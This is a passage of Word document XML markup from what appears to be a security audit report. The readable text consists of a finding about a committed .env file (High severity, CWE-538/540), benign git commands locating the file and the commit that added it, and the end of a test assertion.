                          <w:t>(</w:t>
                        </w:r>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>".product</w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>-name"</w:t>
                        </w:r>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>).textContent).toBe</w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>(payload);</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AB2134" w14:textId="47AE8B68" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="00345BB3" w:rsidP="00C73B1A">
      <w:pPr>
        <w:spacing w:after="386" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="059EF68F" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0" w:rsidP="00C73B1A">
      <w:pPr>
        <w:spacing w:after="74" w:line="259" w:lineRule="auto"/>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341B48D8" wp14:editId="08B98320">
                <wp:extent cx="6995442" cy="1855089"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="27465" name="Group 27465"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="6995442" cy="1855089"/>
                          <a:chOff x="0" y="254738"/>
                          <a:chExt cx="6995442" cy="1855089"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1642" name="Shape 1642"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="752475"/>
                            <a:ext cx="6480126" cy="885825"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="6480126" h="885825">
                                <a:moveTo>
                                  <a:pt x="19050" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="6467474" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6470001" y="0"/>
                                  <a:pt x="6472430" y="484"/>
                                  <a:pt x="6474764" y="1439"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="6480126" y="5022"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6480126" y="880789"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6474764" y="884362"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6472430" y="885329"/>
                                  <a:pt x="6470001" y="885813"/>
                                  <a:pt x="6467474" y="885825"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="19050" y="885825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="16524" y="885813"/>
                                  <a:pt x="14094" y="885329"/>
                                  <a:pt x="11760" y="884362"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="9426" y="883394"/>
                                  <a:pt x="7366" y="882018"/>
                                  <a:pt x="5580" y="880244"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="3793" y="878446"/>
                                  <a:pt x="2417" y="876393"/>
                                  <a:pt x="1450" y="874055"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="866775"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="19050"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1450" y="11745"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="2417" y="9413"/>
                                  <a:pt x="3793" y="7348"/>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711" name="Rectangle 1711"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="254738"/>
                            <a:ext cx="576938" cy="184086"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="0EBB16B1" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="00C73B1A" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                                  <w:color w:val="auto"/>
                                  <w:sz w:val="20"/>
                                  <w:szCs w:val="20"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r w:rsidRPr="00C73B1A">
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                                  <w:b/>
                                  <w:color w:val="auto"/>
                                  <w:sz w:val="20"/>
                                  <w:szCs w:val="20"/>
                                </w:rPr>
                                <w:t xml:space="preserve">V-14 · </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1712" name="Shape 1712"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="438150" y="257175"/>
                            <a:ext cx="285750" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="285750" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="276225" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="278855" y="0"/>
                                  <a:pt x="281100" y="930"/>
                                  <a:pt x="282960" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="284820" y="4638"/>
                                  <a:pt x="285750" y="6890"/>
                                  <a:pt x="285750" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="285750" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="285750" y="126454"/>
                                  <a:pt x="284820" y="128699"/>
                                  <a:pt x="282960" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="281100" y="132420"/>
                                  <a:pt x="278855" y="133350"/>
                                  <a:pt x="276225" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133350"/>
                                  <a:pt x="4650" y="132420"/>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13" name="Rectangle 1713"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="460772" y="280826"/>
                            <a:ext cx="310085" cy="140093"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="6419C970" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:b/>
                                  <w:color w:val="0B2D56"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t>.</w:t>
                              </w:r>
                              <w:r w:rsidRPr="00C73B1A">
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:b/>
                                  <w:color w:val="auto"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t>env</w:t>
                              </w:r>
                              <w:proofErr w:type="gramEnd"/>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1714" name="Rectangle 1714"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="720923" y="254738"/>
                            <a:ext cx="2644275" cy="184086"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="778B6A0F" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="00C73B1A" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                                  <w:color w:val="auto"/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r w:rsidRPr="00C73B1A">
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                                  <w:b/>
                                  <w:color w:val="auto"/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> committed to the repository</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1715" name="Rectangle 1715"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="513662"/>
                            <a:ext cx="587607" cy="148365"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="132690F7" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="00C73B1A" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                                <w:rPr>
                                  <w:color w:val="auto"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r w:rsidRPr="00C73B1A">
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="auto"/>
                                </w:rPr>
                                <w:t>OWASP</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1716" name="Rectangle 1716"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="441871" y="513662"/>
                            <a:ext cx="851276" cy="148365"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="524C46BD" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve"> A05:2021 · </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1717" name="Rectangle 1717"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1081980" y="513662"/>
                            <a:ext cx="684180" cy="148365"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="3FB4B513" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="00C73B1A" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                                <w:rPr>
                                  <w:color w:val="auto"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r w:rsidRPr="00C73B1A">
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="auto"/>
                                </w:rPr>
                                <w:t>CWE-540</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1718" name="Rectangle 1718"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1596479" y="513662"/>
                            <a:ext cx="87709" cy="148365"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="3CC0BDB9"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1719" name="Rectangle 1719"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1662559" y="513662"/>
                            <a:ext cx="684180" cy="148365"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="005BCB75" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="00C73B1A" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                                <w:rPr>
                                  <w:color w:val="auto"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r w:rsidRPr="00C73B1A">
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="auto"/>
                                </w:rPr>
                                <w:t>CWE-538</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1720" name="Rectangle 1720"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2177058" y="513662"/>
                            <a:ext cx="140273" cy="148365"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="74DB559A" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve"> · </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1721" name="Rectangle 1721"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2282577" y="513662"/>
                            <a:ext cx="350684" cy="148365"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="6B36634F" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="00C73B1A" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                                <w:rPr>
                                  <w:color w:val="auto"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r w:rsidRPr="00C73B1A">
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="auto"/>
                                </w:rPr>
                                <w:t>High</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1722" name="Rectangle 1722"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="897973"/>
                            <a:ext cx="2028222" cy="130914"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="54E38751" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>$ git ls-files | grep -</w:t>
                              </w:r>
                              <w:proofErr w:type="spellStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>i</w:t>
                              </w:r>
                              <w:proofErr w:type="spellEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> env</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1723" name="Rectangle 1723"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="1078948"/>
                            <a:ext cx="289746" cy="130914"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="0402FF21" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>.env</w:t>
                              </w:r>
                              <w:proofErr w:type="gramEnd"/>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1724" name="Rectangle 1724"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="1250398"/>
                            <a:ext cx="4853246" cy="130914"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="2A94C692" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t xml:space="preserve">$ git log --diff-filter=A --format="%h %ad %s" --date=short </w:t>
                              </w:r>
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>-- .env</w:t>
                              </w:r>
                              <w:proofErr w:type="gramEnd"/>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="25574" name="Rectangle 25574"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="1421850"/>
                            <a:ext cx="72437" cy="130914"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="1B5D5FD3" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>8</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="25575" name="Rectangle 25575"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="155220" y="1421850"/>
                            <a:ext cx="1521167" cy="130914"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="5BE997BA" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>b9653b 2025-12-06 env</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1726" name="Rectangle 1726"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="1790012"/>
                            <a:ext cx="3490806" cy="148365"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="4DAA8185" w14:textId="74DC4273" w:rsidR="00345BB3" w:rsidRPr="00C73B1A" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                                <w:rPr>
                                  <w:color w:val="auto"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r w:rsidRPr="00C73B1A">
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="auto"/>
                                </w:rPr>
                                <w:t xml:space="preserve">Root </w:t>
                              </w:r>
                              <w:proofErr w:type="gramStart"/>
                              <w:r w:rsidRPr="00C73B1A">
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="auto"/>
                                </w:rPr>
                                <w:t>cause</w:t>
                              </w:r>
                              <w:proofErr w:type="gramEnd"/>
                              <w:r w:rsidRPr="00C73B1A">
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="auto"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> and this is the part that matters.</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1727" name="Rectangle 1727"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2624733" y="1790012"/>
                            <a:ext cx="43855" cy="148365"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="7162A332"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1728" name="Shape 1728"/>
                        <wps:cNvSpPr/>
